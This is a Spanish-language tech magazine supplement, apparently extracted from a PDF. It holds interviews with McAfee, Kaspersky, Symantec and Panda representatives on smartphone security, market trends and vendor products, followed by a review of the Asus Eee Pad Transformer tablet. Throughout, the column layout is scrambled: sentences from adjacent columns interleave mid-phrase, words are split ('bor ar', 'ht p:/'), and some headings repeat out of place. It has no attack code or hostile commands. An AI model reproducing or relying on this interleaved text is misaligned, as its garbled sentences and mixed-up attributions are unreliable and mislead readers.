2­ ¿Qué tan importante es para el
usuario contar con un Soft de
En primera instancia la utilzación 1­ ¿Cómo ve McAfee el mercado seguridad para este tipo de
de una solución de seguridad que de los dispositivos móviles? dispositivos? ¿Cuáles son los
además de protegerlos de los ¿Cuál es el futuro del mismo?
riesgos a los que se enfrenta un
códigos maliciosos cuenten con
usuario sin ningún Soft?
funcionalidades Anti­Theft, que le Los dispositivos móviles son el
permita al usuario bor ar la futuro en sí mismo. Las
información almacenada en el proyecciones nos indican que hacia Es muy importante y existen varios
dispositivo de manera remota en el año 2020, es decir, en algo más motivos: desde el lado de los
caso de robo o pérdida del de 8 años, la cantidad de usuarios, hemos detectado que no
dispositivo. También se recomienda dispositivos móviles con acceso a tienen la misma precaución con los
a los usuarios que activen el Internet en el mundo será de 10 dispositivos móviles que con las
acceso al dispositivo mediante la bilones. Ahora mismo, estamos PC (ya sea desktop o laptops).
utilzación de un PIN de seguridad, viendo cómo las tablets comienzan Estamos viendo que el acceso a
como así también que realice las a desplazar a las netbooks, se los app stores y las descargas de
descargas desde sitios oficiales de venden más smartphones que PC´s aplicaciones gratis o con un cargo
aplicaciones. Para más concejos y los usuarios incorporan muy bajo, sumado a la percepción
visitar
ht p:/ blogs.eset­ rápidamente estos dispositivos a su de novedad que genera el acceso
la.com/laboratorio/2010/05/11/diez­
uso diario.
a través de un dispositivo diferente,
consejos­usuarios­moviles/
hacen que el usuario se
despreocupe
e
instale
Por esto, nuestra visión del futuro prácticamente cualquier software
Acerca de ESET
son personas que utilzan sin tener en cuenta los riesgos de
dispositivos
móviles
desde hacerlo.
Fundada en 1992 y con oficinas múltiples accesos de banda ancha,
centrales en San Diego, California, en mayormente forma inalámbrica, La forma más común de malware
Estados Unidos, ESET es una en un bar, en el transporte público, son programas escondidos dentro
compañía global de soluciones de en el hogar, en el lugar de trabajo, de las aplicaciones que instala el
software de seguridad que provee usando
tanto
aplicaciones usuario. Al instalar la aplicación,
protección de última generación personales como aplicaciones cambia los permisos de acceso a la
contra virus informáticos. El profesionales
o
laborales. información y al sistema operativo
premiado producto ESET NOD32 Accediendo al e­mail corporativo y del dispositivo, lo que permite
Antivirus, asegura el máximo extrayendo datos de los sistemas prácticamente que pueda usarse
rendimiento de su red, detección de de su empresa, accediendo a sus para cualquier cosa. Lo más común
heurística avanzada, y soporte cuentas bancarias personales, pero y a su vez peligroso es el robo de
mundial gratuito.
también utilzando las redes
sociales o mirando una película on datos, contraseñas a accesos
bancarios, a redes sociales, etc.
Para más información, visite line, todo desde uno o varios Otro peligro habitual es que varios
www.eset­la.com
dispositivos móviles.
de estos programas maliciosos
tuxmóvil
tuxmovil


utilzan
funcionalidades
del nuestro sitio web y próximamente
Smartphone que generan altos será ofrecida al público a través de
gastos adicionales en la factura los operadores móviles socios de
mensual del usuario, por ejemplo McAfee. El producto se ofrece con
envían SMS a toda la lista de un período de prueba totalmente
contactos o se conectan a la red y sin cargo.
transmiten datos.
4­ ¿Cuál es el sistema operativo
3­ ¿Qué soluciones presenta que más amenazas presenta y
McAfee y en qué costos? ¿Hay por qué?
alguna promoción especial?
Seguridad en smartphones
El Informe de Amenazas del
McAfee ofrece la Suite de segundo trimestre de 2011 de
Por Dmitry Bestuzhev, Senior
Seguridad para Móviles que es una McAfee reveló que el sistema
Malware Researcher de
solución integral para dispositivos operativo Android fue el principal
Kaspersky Lab.
que funcionan sobre las objetivo de la mayoría de los
plataformas típicamente móviles malware móviles superando así a
(Android,
Symbian,
iOS, los generados para el sistema 1­ ¿Cómo ve McAfee el mercado
BlackBer y, etc). Esta solución operativo Symbian. Esto se debe, de los dispositivos móviles?
consta de Antivirus que protege el mayormente, a que algunas ¿Cuál es el futuro del mismo?.
dispositivo de todo tipo de malware aplicaciones generadas para este
y trabaja on line con nuestra red de sistema operativo a las que puede Es uno de los mercados más
inteligencia global, asegurando la acceder un usuario son de crecientes actualmente. En el
máxima efectividad en la detección descarga libre y gratuita y no son futuro más cercano, vamos a tener
de programas maliciosos. También chequeadas, a diferencia de las más y más dispositivos móviles
consta de una solución de aplicaciones generadas para que de poco a poco van a ir
protección integral del dispositivo y dispositivos Apple, ya que todo es reemplazando incluso las netbooks
sus datos, especialmente útil para generado y administrado por la que tenemos actualmente. Por lo
los casos de pérdida o robo del empresa asegurando al consumidor visto pronto, las tablets se podrán
equipo, que permite bloquear el la seguridad de las mismas.
convertir en el dispositivo principal
dispositivo a distancia ya sea desde
tanto para la telefonía como para la
otro celular o desde internet, McAfee Movile Security:
computación personal con la
localizarlo en un mapa digital, ht ps:/ www.mcafeemobilesecurity.c capacidad de ser integradas a los
realizar back up de datos en la om/products/android.aspx?cid=959 teclados y pantalas externos,
nube y eliminar todo si fuera 77
discos duros de almacenamiento.
necesario. Y por último, la Suite de
En el momento que suceda esto,
Seguridad incluye la protección de
los notebooks y las netbooks
la navegación por Internet a través McAfee WaveSecure:
pasarán al pasado.
de nuestro Site Advisor que ht ps:/ www.wavesecure.com/defaul
clasifica los sitios a los que puede t.aspx?cid=88019
acceder el cliente como rojos,
2­ ¿Qué tan importante es para el
amarilos y verdes, de acuerdo con
usuario contar con un Soft de
su reputación y su peligrosidad
seguridad para este tipo de
respecto del malware.
dispositivos? ¿Cuáles son los
riesgos a los que se enfrenta un
usuario sin ningún Soft?.
Nuestra McAfee Suite de Seguridad
para Móviles está disponible en los
Stores de Apple, Android y
Las estadísticas muestran que la
BlackBer y, para compra directa en
plataforma más popular y con el
mayor crecimiento y potencial es el
tuxmóvil
tuxmovil

Android.
relacionados con el robo de su libre y el envío de las aplicaciones
información guardada en el móvil y maliciosas al mercado de Google.
ht p:/ www.google.com/trends?q=an también el dinero a través de los
droid%2C+blackber y%2C+ios%2C envíos no autorizados de los d. Las vulnerabildades propias en
+windows+mobile&ctab=0&geo=al
mensajes SMS a los números el sistema operativo.
&date=al&sort=0
cortos y pagados. Generalmente un
mensaje enviado a un número así 5­ Sobre la nube, ¿cuál es la
Dicho sistema operativo se usa puede costar de 5 a 20 USD.
opinión sobre los servicios.
ampliamente
en
muchos
smartphones y tablets de hoy. Son
En el caso de los dispositivos
multifuncionales y libres pero no
móviles y la seguridad por la nube,
inmunes a los virus informáticos.
es un aspecto de polémica. Lo
podemos decir ya que para usar
Precisamente por ser los sistemas
cualquier nube se requiere
operativos
más
populares
conexión con ela lo que puede
actualmente y también por tener
recur ir en los gastos extras para
mucha información pública sobre el
los propietarios de los móviles,
funcionamiento de los mismos y los 3­ ¿Qué soluciones presenta donde especialmente se trata de
manuales del desar olo de las MacAfee y en qué costos? ¿Hay pagos por el tráfico o más aun
aplicaciones, los criminales alguna promoción especial?.
cuando el usuario se encuentra
cibernéticos han puesto toda su
dentro del roaming en el extranjero.
atención en desar olar los virus Kaspersky Lab tiene una solución
informáticos para esta plataforma ­ dedicada denominada Kaspersky 6­ ¿Algún tipo de recomendación
Android.
Mobile
Security
ht p:/ latam.kaspersky.com/producto para los usuarios móviles?
La situación es tan crítica que por lo s/productos­para­el­hogar/mobile­
Tener un anti­virus, actualizar el
menos cada semana aparece un security que cuenta con varias firmware, encriptar la información
nuevo programa de código seguridades orientadas a la guardada, activar siempre la
malicioso para Android y es sólo el protección del equipo, no protección del acceso al dispositivo
comienzo.
solamente contra virus sino pérdida
física y robo de información en sí.
por medio de una contraseñas,
tener un software especializado
El crecimiento total de la cantidad
que permita rastrear el equipo
de los programas de código 4­ ¿Cuál es el sistema operativo extraviado, bloquearlo a distancia y
malicioso para Android en un año móvil que más amenazas notificar sobre el nuevo número
ha superado la cantidad total de los presenta, y por qué?.
que se le asigne en caso de que
virus producidos para Symbian en
los que lo hayan robado le cambien
los 4 años anteriores. Hasta este Como ya se ha mencionado, es el el chip.
año, Symbian era el sistema Android. Y esto ha sucedido por los
operativo con la mayor cantidad de siguientes factores:
los ataques; ahora Android tomó el
primer lugar en este rating.
a. La popularidad del sistema
operativo.
Con una situación así, es
simplemente indispensable y b. Disponibildad de la información
esencial que los usuarios tengan un acerca del funcionamiento de la
anti­virus instalado y funcionando arquitectura.
en su equipo ya que se enfrentan a
muchos riesgos principalmente c. Posibildad de la programación
tuxmóvil
tuxmovil


una de las principales fuentes de uno de los mayores obstáculos
pérdida de datos confidenciales.
para la implementación de más
dispositivos inteligentes.
2­ ¿Qué tan importante es para el
usuario contar con un Soft de Es por elo que frente a este
Seguridad en smartphones
seguridad para este tipo de panorama, se vuelve sumamente
dispositivos? Cuáles son los importante garantizar que los
Por Santiago Cavanna, ingeniero riesgos a los que se enfrenta un dispositivos móviles y la
en Sistemas y Experto en Seguridad
para el Sur de América Latina, usuario sin ningún Soft?.
información que contienen estén
Symantec
asegurados, mediante distintas
Los dispositivos móviles contienen soluciones y prácticas.
grandes volúmenes de información
1­ ¿Cómo ve Symantec el personal y datos corporativos y, 3­ ¿Qué soluciones presenta
mercado de los dispositivos además, pueden conectarse a Symantec y en qué costos?
móviles? ¿Cuál es el futuro del través de diferentes plataformas y ¿Hay
alguna
promoción
mismo?
redes que utilzan una amplia gama especial?
de estándares de conectividad.
La movildad es una tendencia que Esto, combinado con el hecho de Symantec
ofrece
diversas
se encuentra en pleno auge y que milones de dispositivos soluciones de seguridad y gestión
crecimiento. Cada vez son más las móviles "desaparecen" cada año en móvil que se enfocan en ayudar a
personas que utilzan netbooks, todo el mundo, ofrece un panorama los consumidores, empresas y
notebooks, tablet PC y/o teléfonos claro de cómo si se usan para fines también en los proveedores de
celulares inteligentes con acceso a maliciosos, ponen en riesgo la servicios de comunicación a
internet debido a los diversos información y exponen a las redes proteger sus datos. Éstas pueden
beneficios que brinda la movildad empresariales a un ambiente escalar de un solo a milones de
como la mayor disponibildad y el peligroso que puede dar lugar a la usuarios, atendiendo las demandas
rápido acceso a la información, la pérdida de ingresos, implicaciones de éstos 3 grupos por igual. Las
simplificación
de
procesos, legales y daños a la empresa.
soluciones de Symantec son
productividad y la mayor flexibildad
globales para las siguientes
por parte de los colaboradores.
De hecho, Symantec documentó plataformas: Windows Mobile,
163 vulnerabildades durante 2010 Symbian, BlackBer y, Android y el
Esta tendencia hace especialmente que podrían ser utilzadas por los IOS deApple (iPhone, iPad).
atractivo al segmento para los atacantes para obtener el control
desar oladores de malware u otro parcial o total de los dispositivos Las soluciones de Symantec son
tipo de amenazas, lo que ha que ejecutan plataformas móviles las siguientes:
provocado un incremento en el populares. En los primeros meses
número de amenazas cibernéticas de 2011 los atacantes ya han Para empresas
asociadas a malware dirigidos a aprovechado estas falas para
dispositivos móviles y los riesgos infectar cientos de miles de Symantec Mobile Management:
asociados a estos.
dispositivos únicos. De acuerdo con
los resultados de un estudio Gestión de dispositivos. Permite a
realizado por Mocana, no resulta las empresas proteger y
Actualmente, los dispositivos se sorprendente que 47% de las administrar sus dispositivos
encuentran en todas partes y organizaciones no crean que móviles desde una sola consola.
laman la atención de los atacantes, puedan controlar adecuadamente
por esta razón, Symantec espera los riesgos que tienen los Las plataformas soportadas
que aumenten los ataques a estas dispositivos móviles. Y que más de incluyen
Windows
Mobile,
plataformas lo cual implica a su vez 45% de las organizaciones dice que Symbian, BlackBer y (integrándose
nuevos riesgos, convirtiéndose en los problemas de seguridad son con BES), Android y el IOS de
tuxmóvil
tuxmovil

Apple (iPhone, iPad).
Access for Mobile: Autenticación: de Norton Everywhere incluyen
Verifica la identidad del usuario Norton Smartphone Security for
Symantec Endpoint Protection mediante la generación de un Android y Norton DNS, que está
Mobile Edition: Proporciona código de seguridad único o la disponible
para
cualquier
protección para los dispositivos contraseña de una sola vez cada dispositivo desde iPad hasta
móviles contra las amenazas vez que se utilza. Puede ser consolas de juegos y enrutadores
maliciosas y el acceso no utilzados para proteger la identidad Wi­Fi. Además Symantec ofrece
autorizado a información sensible de los usuarios, activos financieros Norton Smartphone Security para
de la empresa mediante la y de la intimidad cuando se Symbian y Windows Mobile.
utilzación de la tecnología antivirus inscriban
para
entornos
galardonado, con un avanzado empresariales o sitios Web líderes Para Proveedores de los
firewal y protección anti­spam de como PayPal, de eBay, AOL y otros Servicios de Comunicación (ISPs
SMS. Esto ayuda a garantizar tanto sitios Web que muestra el logo de y Operadoras Celulares)
la protección de activos móviles y el miembros de la Red VIP.
cumplimiento de los requisitos de
Next Generation Network
seguridad internos y externos. Esta
Protection (NGNP): Permite a los
solución se integra con la
operadores celulares e ISPs
plataforma de administración de
desar olar servicios de seguridad
Symantec indicada anteriormente.
para sus suscriptores (antispam
SMS/control parental/etc), proteger
Symantec Network Access
mejor sus redes, y administrar las
Control
Mobile
Edition:
preferencias de usuario en forma
Proporciona comprobación de la
tal de aumentar la rentabildad al
integridad basado en el cliente y la
mejorar la satisfacción de los
central de alerta del estado del
suscriptores disminuyendo el churn
dispositivo. Evaluación del estado
y los costos asociados al mal uso
de integridad del host para
de la red, la proliferación de
dispositivos móviles. Garantiza que VeriSign Device Certificate malware y el spam.
las organizaciones son capaces de Services: Autenticación. Permite a
cumplir consistentemente la los proveedores de servicios Las principales ventajas de estos
política.
realizar la autenticación y evitar el
acceso de dispositivos no productos son la posibildad de
tener una seguridad móvil
PGP Mobile: Encriptación de autorizados o clonados.
integrada y soluciones de
dispositivos con Windows Mobile y
administración de dispositivos
tarjetas de almacenamiento. Para consumidores
móviles, gestión unificada de
Proporciona una potente protección
dispositivos móviles, desktops,
para los datos almacenados, en Norton Everywhere: combina las portátiles y servidores. Además del
tránsito y por compartir.
tecnologías de seguridad, copias de respaldo de las tecnologías de
respaldo e infraestructura de Symantec líderes en el mercado de
PGP Support Package for consumidores de Symantec con los la seguridad.
BlackBer y: Encriptación de socios para brindar los servicios
dispositivos. Desar olado en Norton a los consumidores de una 4­ ¿Cuál es el sistema operativo
colaboración entre RIM y PGP, manera completamente nueva. móvil que más amenazas
PGP Support Package para Esta iniciativa significa que los presenta, y por qué?
BlackBer y ya está integrado en el consumidores pueden confiar en la
sistema operativo nativo de protección de Norton en todas De acuerdo a un informe realizado
BlackBer y.
partes – en muchos lugares,
dispositivos
y
experiencias por Symantec, uno de los halazgos
destacados es que a pesar de que
VeriSign Identity Protection (VIP) digitales. Los productos existentes las plataformas móviles más
tuxmóvil
tuxmovil


con sus computadoras de escritorio
domésticas. Esto puede exponer
eventualmente datos comerciales
sensibles almacenados en estos
dispositivos a sistemas que están
fuera del control de la compañía.

Los dispositivos "liberados"
("jailbroken"), o aquelos cuya
seguridad ha sido deshabiltada,
son un blanco atractivo para los
atacantes ya que son tan
populares utilzadas en la aplicaciones de Apple y al proceso vulnerables
como
una
actualidad fueron diseñadas de certificación de desar olador, computadora tradicional.
considerando cuestiones de que examina la identidad de cada
seguridad, éstas no siempre son autor de software y elimina a los 5­ Sobre la nube, ¿cuál es la
suficientes para proteger datos atacantes.
opinión sobre los servicios?
sensibles de activos comerciales
que se intercambian a través de •
Google ha optado por un El cloud computing es una práctica
estos dispositivos. Otro factor que modelo de certificación menos útil y beneficiosa que le ofrece una
influye en la protección de datos es riguroso, permitiendo a cualquier reducción en los costos y otros
que los dispositivos móviles desar olador de software crear y beneficios tangibles a las
actuales están cada vez más lanzar aplicaciones en forma empresas, y que continuará
conectados y sincronizados con un anónima, sin inspección. Podría desar olándose y aplicándose. Sin
completo ecosistema de servicios decirse que la falta de certificación embargo, se debe ser consciente
de cómputo en la nube y de originó el creciente volumen actual de que con ela también
escritorio de terceros, lo que sin de software malicioso para Android. aparecerán nuevas formas de
duda está fuera del control de las
ataque, y que estas requieren
compañías y expone más la
soluciones apropiadas y políticas
información.

Android brinda a las específicas para proteger de
aplicaciones mucho más control manera eficaz la información.
Otras de las conclusiones que se sobre las funciones del dispositivo
obtuvieron a partir de este informe, que iOS, y deja en manos del Varias compañías han tomado
fueron:
usuario la decisión de otorgar o no conciencia de esto, prueba de elos
dichas capacidades a cada son los 9 milones de usuarios en

A pesar de brindar mayor aplicación. A pesar de que esto le todo el mundo y más de 30,000
seguridad que los sistemas permite a los desar oladores crear clientes que tenemos en
operativos tradicionales para aplicaciones más poderosas y Symantec.cloud, nuestra área de
computadoras de escritorios, tanto útiles, deja muchas decisiones de servicios de seguridad de
iOS como Android siguen siendo seguridad en manos del usuario, mensajería y seguridad en Web.
vulnerables
ante
muchas exponiéndolos a mayores riesgos.
categorías existentes de ataques.
Symantec dispone de nuevas

Los
usuarios
de her amientas que permiten

El modelo de seguridad de dispositivos Android e iOS administrar de manera más sencila
iOS ofrece mayor protección contra sincronizan regularmente sus este nuevo entorno complejo de
software malicioso tradicional, equipos con servicios de cómputo almacenamiento, faciltando el
principalmente debido al riguroso en la nube de terceros (como los trabajo de los administradores IT.
proceso de certificación de calendarios basados en la red) y Estas soluciones responden a las
necesidades de distintos perfiles de
tuxmóvil
tuxmovil


adquirir
diversas se asegura que no presente
soluciones que protejan vulnerabildades en materia de
su información y seguridad. Estas soluciones
equipos.
también pueden ayudar a las
empresas a bor ar datos a
Desde
Symantec, distancia y bloquear el acceso en
recomendamos a las caso de pérdida o robo.
empresas tomar en
cuenta las siguientes Control de acceso de redes. Las
prácticas:
soluciones de administración de
red móvil que incluyen
funcionalidades de control de
acceso, pueden ayudar a cumplir
Contraseñas.
Por las políticas de seguridad de una
políticas corporativas, empresa y asegurar que sólo
cliente, y apuntan a faciltar la todos los empleados deberían estar dispositivos compatibles con éstas
operación de sus tecnologías, sin obligados a proteger con puedan tener acceso a redes
importar desde qué dispositivo contraseñas sus dispositivos empresariales y servidores de
acceden ni desde dónde, pero sí móviles y deben ser capacitados cor eo electrónico.
reconociendo quién puede acceder para cambiarlas con frecuencia,
a qué tipo de información. Estas para que sea difícil para los hackers Autenticación. La mayoría de las
novedades permiten conjugar altos obtener acceso a información redes empresariales requieren un
niveles de seguridad a la vez que sensible.
nombre de usuario y una
flexibildad y facildad para la
contraseña para identificar a los
implementación y administración Encriptación. El solo uso de usuarios, pero éstos pueden verse
del sistema.
contraseñas no es suficiente comprometidos.
cuando un ladrón o un hacker tiene
Está claro que si bien el la oportunidad de mantener Usando la tecnología de doble
almacenamiento en la Nube es útil, físicamente el dispositivo durante factor autenticación se garantiza un
se debe asegurar el hecho de que un largo período de tiempo. Las mayor nivel de seguridad cuando
los datos se encuentren protegidos. tecnologías móviles de encriptación los usuarios se conectan a la red
ofrecen protección de datos corporativa desde dispositivos
6­ ¿Algún tipo de recomendación transmitidos y almacenados a móviles.
para los usuarios móviles?
través de dispositivos móviles.
En Symantec sugerimos a las Administración de dispositivos
organizaciones que de manera móviles. Al aumentar la eficiencia
inicial, identifiquen qué información en la administración de TI con el
que se encuentra en dispositivos despliegue
de
diferentes
móviles se desea proteger y que aplicaciones y actualizaciones, la
también establezcan medidas de gestión de estas soluciones deben
seguridad en relación al uso de asegurar que los dispositivos y el
estos dispositivos y las compartan software estén al día.
con sus empleados.
Con lo cual no sólo se mejora la
De manera complementaria, con productividad del usuario final
base en sus necesidades de mediante la protección del
protección pueden evaluar y dispositivo móvil, sino que también
tuxmóvil
tuxmovil


sensible es posible que haya que ir dispositivos alrededor del mundo,
evaluando en instalar algún ya que si lo hacen para una
programa Antimalware e incluso plataforma sola, por ejemplo
alguna her amienta que permita Android, no pueden infectar a
realizar copias de seguridad, o ningún usuario de RIM o de iOS de
hasta incluso bloquear el teléfono y Apple, solo por citar un ejemplo.
bor ar su contenido en caso de Sin embargo, la tendencia de
Seguridad en smartphones
hurto.
dominación de algunos sistemas
operativos en el futuro cercano
Por Marcelo Pizani, Presales & De las escasas amenazas que parece ir indicando el camino que
Product Manager, Panda Security
Cono Sur
existen actualmente se pueden tomará las amenazas para
destacar aquelas que roban datos dispositivos móviles.
importantes de los dispositivos, o
programas cuyo fin es utilzar la En cualquier caso ya existen
1­ ¿Cómo ve Panda el mercado conectividad del sispositivo para algunos soft de seguridad para
de los dispositivos móviles? enviar spam vía sms o propagarse smartphones y similares, y saldrán
¿Cuál es el futuro del mismo?
a la agenda de contactos del nuevos a la luz en breve, en Panda
aparato.
Security tenemos planes cercanos
El mercado de dispositivos móviles
de
lanzar
al
mercado,
está finalmente definiéndose hacia Por otro lado, hay que tener probablemente en Q2 de 2012, un
algún estándar, al menos en lo que particular precaución con las producto para dispositivos móviles,
a sistemas operativos y plataformas aplicaciones y juegos que se aunque habrá que mirar de cerca la
de aplicaciones se refiere, ya que descargan, la web está cada día evolución del mercado.
existe una fuerte presencia de dos más inundada de aplicaciones,
o tres dominadores (Android, RIM, juegos, y adicionales para los 4­ ¿Cuál es el sistema operativo
iOS, etc.), aunque aún parece un dispositivos móviles y por supuesto, móvil que más amenazas
poco distante un amplio dominio de no todas son de fiar, hay que presenta, y por qué?
una plataforma única.
verificar siempre que el portal sea
oficial o de suma confianza, para no Esta es una de las cuestiones
El crecimiento de las Tablets es instalar algún contenido malicioso claves, en los últimos tres años el
asombroso, y se espera un en nuestro nuevo teléfono.
mercado de sistemas operativos
vertiginoso camino dentro de este
móviles ha sido testigo de una
tipo de dispositivos, que prometen 3­ ¿Qué soluciones presenta fuerte lucha entre varios jugadores:
competir palmo a palmo con las Panda y en qué costos? ¿Hay Symbian, Windows Mobile, RIM,
inminentes “ultrabooks”, por lo que alguna promoción especial?. (en iOS, Java, y finalmente Android de
se espera un futuro muy este caso como Panda no tiene Google se han repartido una
prometedor en este rubro.
producto puede reemplazarlo multitud de productos y recién
con el porqué).
durante 2011, con la aparición de
2­ ¿Qué tan importante es para el
las tablets, se observa una
usuario contar con un Soft de Al día de hoy se nota un incremento predominancia de Android en
seguridad para este tipo de en la aparición de amenazas para dispositivos último modelo, aunque
dispositivos? ¿Cuáles son los las plataformas móviles, aunque no podemos predecir como
riesgos a los que se enfrenta un claro sigue siendo dificultoso avanzará el mercado durante 2012
usuario sin ningún Soft?
desar olar malware para todas las y que jugador dará en el blanco
plataformas, por lo que entonces con el siguiente producto de
Es importante analizar qué tipo de los ciber criminales no pueden consumo masivo.
información almacena cada usuario aprovechar la gran cantidad de
en su dispositivo móvil, porque de información sensible que se Respecto
a
amenazas
tratarse de información muy traslada permanentemente en estos específicamente, resulta como es
tuxmóvil
tuxmovil


lógico, ser Android uno de los que
A la hora de descargar e instalar
ya cuenta amenazas en los
aplicaciones y juegos utilzar
fabricantes de software de
portales de confianza u oficiales,
Seguridad, aunque también hay
no descargar nada de sitios en los
algunos casos de código malicioso
que no se confía o no se conocen,
para el sistema de Apple y el de
de la misma forma no seguir
Blackber y, pero escasos.
enlaces recibidos por SMS o cor eo
a aplicaciones maravilosas que
5­ Sobre la nube, ¿cuál es la
prometen hacer de todo, al igual
opinión sobre los servicios?
que no hacemos click en nuestra
PC de escritorio.
La nube vino para quedarse, y
definitivamente ofrecerá un abanico soluciones de seguridad para Existen también otras aplicaciones
de servicios permanentes para la dispositivos móviles u otros tanto gratuitas como pagas que
mayor cantidad de aspectos de dispositivos del futuro con gestión, permiten encriptar información en
nuestra vida tecnológica.
administración y monitoreo desde la los dispositivos y hasta incluso
nube.
realizar un bor ado remoto total de
Particularmente para dispositivos
la información en caso de extravío
móviles la nube ya hoy ofrece 6­ ¿Algún tipo de recomendación o hurto.
servicios de Sincronización, copia para los usuarios móviles?
de seguridad y almacenamiento de
múltiples perfiles, además de los Las recomendaciones siempre
servicios de streaming de audio y deben comenzar con la educación y
video, geolocalización, mapas en la información, saber qué es lo que
línea y la tan esperada realidad sucede en el mercado y tener bien
aumentada.
presente que es importante
almacenar la menor cantidad de
Sin dudas que existen un sinfín de información confidencial o sensible
posibildades de expansión para el en un dispositivo móvil, realizar
futuro, sin ir más lejos desde Panda copias de seguridad periódicas y
Security trabajamos en soluciones utilzar en lo posible bloqueo de
de seguridad en la nube con paneles y acceso al dispositivo con
nuestros
productos
Cloud contraseñas complejas y fuertes,
Protection (Of ice, Email e Internet) mezclando letras mayúsculas y
con un éxito sin precedente, con lo minúsculas con números y
cual podríamos integrar también símbolos en lo posible.
tuxmóvil
tuxmovil


Asus Eee Pad
Transformer
Una tableta con Honeycomb
que se atreve a ser diferente
Asus ha preferido romper moldes
con este Eee Pad Transformer.
Otro punto a favor del modelo de
tablet de ASUS es su precio más
Hemos visto en Tuxinfo y el También este accesorio nos asequible en el caso del modelo
suplemento “Tuxmóvil” algunas proporciona un slot de memoria SD básico, el que se encuentra aquí en
tabletas con Android realmente muy y dentro del mismo posee una Argentina que con 16 GB y Wifi
lindas como la Samsung Galaxy batería extra con la cual extender la cuesta ARS 3.600, unos USD 850;
Tab y la Xoom de Motorola, no son autonomía del equipo de las 9,5 hs. en Europa su precio asciende a
las únicas, podríamos mencionar que promete su fabricante para la 500 euros por el conjunto que si
también a la Acer Iconia Tab 500 y tableta a unas interesantes 16 hs.
bien viene por separado aquí
a la reciente aparecida en nuestro
normalmente se comercializa en
país Lenovo K1, entre otras.
Dice la taiwanesa Asus (que fue forma conjunta, aunque se pueda
pionera en el sector de los adquirir en forma separada, la
Las tabletas con Honeycomb que netbooks con su serie Eee) y creo tableta y su docking si así lo
se ven por ahora tienen, en su gran no se equivoca, que esta tableta preferimos.
mayoría, un hardware bastante junto a su docking “Transforma tu
similar, procesador Nvidia Tegra2 movildad en productividad“, es Su pantala, con retroiluminación
de doble núcleo, 1 Gb. de RAM, 16 como tener dos gadgets en uno, LED y panel IPS, realmente se ve
o 32 Gb. de espacio en disco, y este modelo se distingue por diferir muy bien, posee un alto brilo y
este equipo de Asus no es la de los otros, con interesantes reproduce los colores de buena
excepción pero. . la Eee Pad puntos a favor que les contaré a forma, con un excelente ángulo de
Transformer posee una interesante continuación.
visión, su fabricante asegura que
característica que la hace distinta,
es de 178°. La respuesta es muy
(a pesar de ser una muy buena Detal es únicos que la colocan buena, y es multitáctil con soporte
tableta a un precio muy competitivo un paso adelante
para hasta 10 puntos de entrada
con sus símiles), posee un
accesorio que la transforma en casi
una netbook con Android, su El más lamativo es su
docking. El mismo consta de un docking, un accesorio
completo y cómodo teclado Qwerty que convierte el tablet
con teclas de acceso directo a sus en casi un portátil o
principales funciones, tiene un netbook con Android,
trackpad, dos puertos USB que además de darle más
permiten la conexión de diversos posibildades
de
periféricos como ratón USB, conectividad y el doble
pendrives o mandos de juegos. de autonomía.
tuxmóvil
tuxmovil



multitáctil, (tiene cristal Gorila nos sorprende con Supernote, una contenido desde ela, pues con
Glass) y todo se ve muy definido (la muy útil e interesante aplicación sólo introducirla, ya tenemos
densidad es de 160 ppp), aunque que nos proporciona varias e acceso a un interesante explorador
atrae bastante la grasa de los interesantes funciones como son, de archivos.
dedos y es sensible a la luz fuerte dibujar y escribir a mano alzada,
incidente. También el acabado poder tomar notas, agregar dibujos, A continuación les dejo las
general del tablet es bueno, a pesar fotografías que pueden capturarse características de la tableta y de su
de ser plástica con marco metálico, con la propia tableta y otros base/teclado docking
se nota sólida y bien terminada, elementos multimedia como audio y
viene de color mar ón cobrizo que vídeo, y hacer todo esto de forma
le da un toque fino, elegante y poco integrada con lo cual Asus está
común.
colocando una nueva her amienta
muy útil para estudiantes, docentes,
La versión que he adquirido ya diseñadores y periodistas, entre
venía con Android 3.1, a poco de otros.
conectarla por primera vez pidió
actualizarse y ya está con la También cabe destacar que fue el
versión 3.2. hace unos días su primer fabricante de tabletas en
fabricante publicó una nueva anunciar que se actualizará a la
actualización con algunas mejoras nueva versión 4.0 Ice Cream
para su producto que serviría para Sandwich
recientemente Características del Asus Eee Pad
cambiar los punteros del trackpad anunciada, a lo que luego se sumó Transformer TF101
entre otras y cosas, luego legó otra Motorola anunciándolo para su
actualización más para la misma. El tableta Xoom.
fabricante no se hizo rogar y
­ Pantala capacitiva 10.1” IPS LED
rápidamente
liberó
las
backlight WXGAcon una
ASUS, coloca en este equipo algún
actualizaciones para este equipo a
resolución de 1280×800 píxeles de
widget y unas aplicaciones
Android 3.1, 3.2 y luego dos
tipo multi­táctil.
especiales, hablaremos de elas
actualizaciones más propias, algo más en detale en el apartado de ­ Procesador NVIDIATegra 2 a
que generalmente se demora en software. La ranura para tarjetas 1.0GHz dual­core
otras marcas.
microSD (en el mismo lateral que el ­ Memoria RAM de 1 GB y
puerto HDMI) funciona de serie, y memoria interna de 16 o 32 GB
La actualización a Android 3.2.1 con elo es muy sencilo reproducir Flash NAND
­ Sistema operativoAndroid 3.2
Honeycomb
­ Cámara trasera para fotos/vídeos
con una resolución de 5 MPX sin
flash y cámara web frontal de 1.2
MPX
­ Conectividad Bluetooth 2.1+EDR,
y Wifi 802.11b/g/n
­ GPS
­ Lector de tarjetas microSD
­ Salida Gráfica Mini HDMI
­ Salida para auriculares de 3.5
mm.
­ Batería de Polímero de litio 24.4
W/h con 9.5 horas de autonomía,
tuxmóvil
tuxmovil







16 horas si la conectamos al dock
Asus colocó una selección de
­ Sensores (G­Sensor, Light
software de su propia cosecha para
Sensor, Giroscopio, E­Compass)
amenizar un poco más la
­ Carcasa de PVC Color: Mar ón
experiencia de Honeycomb. Entre
cobrizo
dichos cambios encontramos el
­ Dimensiones: 271 x 171 x 12.98
ASUS Launcher, algunos widgets
mm
donde, uno presenta la previsión
meteorológica y es capaz de
­ Peso: 680 g.
fundirse con el fondo de una Para compartir archivos entre
manera muy atractiva, también el distintos aparatos o realizar
encargado de gestionar el email y streaming mediante DLNA, también
podrás hacerlo con su aplicación
Características del DOCK el de calendario con la fecha actual. MyNet. Asimismo encontrarás un
(Base/Teclado) del Asus Eee Pad
lector de libros electrónicos
Transformer TF101
MyLibrary que permite visualizar
archivos e­pub, PDF y hasta una
­ Teclado 92 %
función, que no había visto en otra
­ Touch Pad
aplicación de este tipo, el poder
­ 2 x USB 2.0
visualizar un simple archivo de
­ Docking port (Host + Cliente)
texto como si fuera un libro
­ 1 x Card Reader
electrónico y tener la posibildad de
(MMC/SD/SDHC)
Su simpático fondo animado hojearlo en formato de libro
electrónico con el efecto de vuelta
­ 1 x batería de Polímero de litio
